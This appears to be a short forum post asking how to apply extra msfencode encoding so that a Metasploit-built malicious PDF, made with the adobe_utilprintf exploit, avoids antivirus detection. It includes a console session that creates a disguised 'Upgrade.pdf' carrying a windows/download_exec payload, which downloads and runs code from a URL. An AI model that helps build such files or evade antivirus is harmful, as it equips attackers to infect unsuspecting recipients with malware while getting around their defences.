I'm not sure I will want to `svn up` tomorrow. This Cyberwarfare version has advanced powers:
just quick question about bypassing AV with msfencode, when creating PDF-exploit file for client side attack:
- does it possible to perform an additional encoding (or run encoder repeatedly) for the chosen payload during the exploit creation session? The default encoding are not enough to create 'clean' PDF exploit file, as all AVs flag it.
msf > use exploit/windows/fileformat/adobe_utilprintfmsf exploit(adobe_utilprintf) > set FILENAME Upgrade.pdfFILENAME => Upgrade.pdfmsf exploit(adobe_utilprintf) > set PAYLOAD windows/download_execPAYLOAD => windows/download_execmsf exploit(adobe_utilprintf) > set URL http//..URL => http://..msf exploit(adobe_utilprintf) > exploit... ...
Is it possible to add additional payload encoding during the exploit creation?